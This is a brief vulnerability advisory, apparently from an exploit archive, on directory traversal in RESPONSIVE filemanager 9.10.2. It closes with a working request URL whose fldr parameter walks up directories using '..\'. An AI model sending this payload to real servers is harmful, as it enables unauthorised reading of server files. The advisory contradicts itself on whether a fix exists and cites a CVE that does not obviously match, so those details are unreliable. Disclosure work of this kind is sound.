RESPONSIVE filemanager <= 9.10.2 - Directory Traversal
Advisory: Directory Traversal in RESPONSIVE filemanager on Window Server
During a penetration test discovered a directory traversal vulnerability
in RESPONSIVE filemanager. Attackers are able to read arbitrary directory by specifying a
relative path.
Details
=======
Product: DRESPONSIVE filemanager
Affected Versions: RESPONSIVE filemanager v9.10.2
Fixed Versions: Not yet
Vulnerability Type: Directory Traversal
Vendor URL:
http://www.responsivefilemanager.com/
Software Link:
https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.10.2/responsive_filemanager.zip
Vendor Status: fixed version released
Advisory URL: http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
Tested on: WINDOW SERVER
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575
Attack Detail
[URL]/filemanager/dialog.php?editor=tinymce&type=&lang=&popup=0&field_id=&relative_url=0&akey=key&fldr=..\
fldr=..\..\..\